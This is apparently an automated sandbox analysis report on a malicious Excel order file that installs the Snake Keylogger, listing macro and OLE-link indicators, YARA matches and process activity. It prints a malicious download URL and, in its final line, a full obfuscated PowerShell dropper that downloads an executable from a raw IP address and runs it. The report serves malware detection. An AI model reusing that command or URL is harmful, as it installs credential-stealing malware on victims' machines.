Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_002DC750 23_2_002DC750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_002D5028 23_2_002D5028
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_002D7001 23_2_002D7001
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_002D6BA0 23_2_002D6BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_002D7461 23_2_002D7461
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_002DFCAD 23_2_002DFCAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_002DC744 23_2_002DC744
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_002DBFC8 23_2_002DBFC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_0044F460 23_2_0044F460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_0044D4E0 23_2_0044D4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_0044C480 23_2_0044C480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_0044E178 23_2_0044E178
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_00445E58 23_2_00445E58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_0044EE10 23_2_0044EE10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_0044DB30 23_2_0044DB30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_0044E7C0 23_2_0044E7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_00444444 23_2_00444444
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_00444448 23_2_00444448
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_00449459 23_2_00449459
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_00449468 23_2_00449468
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_00441470 23_2_00441470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_0044101B 23_2_0044101B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_00441028 23_2_00441028
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_0044C028 23_2_0044C028
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_00446CC8 23_2_00446CC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_004418C9 23_2_004418C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_004418D8 23_2_004418D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_0044C8D8 23_2_0044C8D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_004498E8 23_2_004498E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_00444CE8 23_2_00444CE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_00444CF8 23_2_00444CF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_00441480 23_2_00441480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_004448A0 23_2_004448A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_00446CBC 23_2_00446CBC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_00449D40 23_2_00449D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_00445140 23_2_00445140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_00445150 23_2_00445150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_00442178 23_2_00442178
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_00441D2B 23_2_00441D2B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_00441D30 23_2_00441D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_004425D0 23_2_004425D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_004425E0 23_2_004425E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_0044A5E1 23_2_0044A5E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_0044A5F0 23_2_0044A5F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_004459FD 23_2_004459FD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_00442188 23_2_00442188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_0044A188 23_2_0044A188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_0044A198 23_2_0044A198
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_004455A5 23_2_004455A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_004455A8 23_2_004455A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_0044AA48 23_2_0044AA48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_00445A00 23_2_00445A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_00447A00 23_2_00447A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_00447A10 23_2_00447A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_00442A28 23_2_00442A28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_00442A38 23_2_00442A38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_0044AA38 23_2_0044AA38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_004432DC 23_2_004432DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_004432E8 23_2_004432E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_004486F9 23_2_004486F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_00442E81 23_2_00442E81
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_00442E90 23_2_00442E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_0044AE90 23_2_0044AE90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_00447698 23_2_00447698
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_0044AEA0 23_2_0044AEA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_00443740 23_2_00443740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_0044B767 23_2_0044B767
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_00440768 23_2_00440768
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_00440778 23_2_00440778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_0044B778 23_2_0044B778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_0044030F 23_2_0044030F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_00448708 23_2_00448708
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_0044B311 23_2_0044B311
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_00440320 23_2_00440320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_0044B320 23_2_0044B320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_00443734 23_2_00443734
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_00440BC0 23_2_00440BC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_0044BBC1 23_2_0044BBC1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_00440BD0 23_2_00440BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_0044BBD0 23_2_0044BBD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_00443FE8 23_2_00443FE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_00443FF0 23_2_00443FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_00443B88 23_2_00443B88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_00443B98 23_2_00443B98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_00560040 23_2_00560040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_00560CD8 23_2_00560CD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_00560690 23_2_00560690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 23_2_00560006 23_2_00560006
Document contains embedded VBA macros
Source: SYSN ORDER.xls OLE indicator, VBA macros: true
Document embeds suspicious OLE2 link
Source: SYSN ORDER.xls Stream path 'MBD001B9740/\x1Ole' : https://og1.in/cIP5a8miBIeF/GQC',"YaFEdijZulawZYSksOQlKCUWxjdwUoA4h2GpYRQlYTPBA24YDisF2ZW9APJjMjVsD7InAfF30tXJqFHsNJPHgLhKVU47sdTJoHRZ7OtgjdqGyE1Z0FmDcCYjJOrVYsLAqhDnTkepq0MsMMtBouvigw8ZmOmIM31YFW10fPTlf5IBCSDjDt3SxoGb4QB8m46M0Pdma40d9k1F5XnmlLNx1GSAAJYMbxkk21wpXsW4Idy01pDY)?sjXp2w_]%jW<
Source: B8230000.0.dr Stream path 'MBD001B9740/\x1Ole' : https://og1.in/cIP5a8miBIeF/GQC',"YaFEdijZulawZYSksOQlKCUWxjdwUoA4h2GpYRQlYTPBA24YDisF2ZW9APJjMjVsD7InAfF30tXJqFHsNJPHgLhKVU47sdTJoHRZ7OtgjdqGyE1Z0FmDcCYjJOrVYsLAqhDnTkepq0MsMMtBouvigw8ZmOmIM31YFW10fPTlf5IBCSDjDt3SxoGb4QB8m46M0Pdma40d9k1F5XnmlLNx1GSAAJYMbxkk21wpXsW4Idy01pDY)?sjXp2w_]%jW<
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Yara signature match
Source: 00000017.00000002.629152726.0000000000416000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000017.00000002.629152726.0000000000416000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: RegSvcs.exe PID: 3176, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 3176, type: MEMORYSTR Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winXLS@27/30@46/10
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\B8230000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Mutant created: NULL
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR8A06.tmp Jump to behavior
Source: SYSN ORDER.xls OLE indicator, Workbook stream: true
Source: B8230000.0.dr OLE indicator, Workbook stream: true
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: .................P................m.......m.....}..w.............................1......(.P..............3.......................{b............. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................Cm....................../..l....}..w.....{b.....\.......................(.P.....................8............................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: .........................................{b.....}..w.............$[........l......Z.....(.P..................................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................Cm....................../..l....}..w.....{b.....\.......................(.P.....................8............................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: .........................................{b.....}..w.............$[........l......Z.....(.P..................................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.............N....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..$[........l......Z.....(.P............................. ....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: .........................................{b.....}..w.............$[........l......Z.....(.P..................................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.........................@....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: .........................................{b.....}..w.............$[........l......Z.....(.P..................................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................ . . .S.t.r.i.n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...........N....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: .........................................{b.....}..w.............$[........l......Z.....(.P.............................l....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................ ........{b.....}..w.............$[........l......Z.....(.P..................................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: .................{b.............0........Wl.....}..w....8.......@E......^...............(.P..................................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: .................{b......................Wl.....}..w....8.......@E......^...............(.P..................................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: .................Py.............................}..w..............D.......D......1D.....(.P.......D......3D......................(..............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................Cmy...................../Y.l....}..w.....(......\.F.......D.............(.P.....\...............H...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: .........................................(......}..w..............g......X.l............(.P.....\...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................Cmy...................../Y.l....}..w.....(......\.F.......D.............(.P.....\...............H...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: .........................................(......}..w..............g......X.l............(.P.....\...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.............N.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1...g......X.l............(.P.....\....................... .......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: .........................................(......}..w..............g......X.l............(.P.....\...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.\.......................@.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: .........................................(......}..w..............g......X.l............(.P.....\...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................ . . .S.t.r.i.n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...........N.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: .........................................(......}..w..............g......X.l............(.P.....\.......................l.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................ ........(......}..w..............g......X.l............(.P.....\...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: .................(..............0..x1....W......}..w....H.......@EE.....^...............(.P.....\...............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: .................(..................1....W......}..w....H.......@EE.....^...............(.P.....\...............................................
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: SYSN ORDER.xls ReversingLabs: Detection: 21%
Source: SYSN ORDER.xls Virustotal: Detection: 25%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"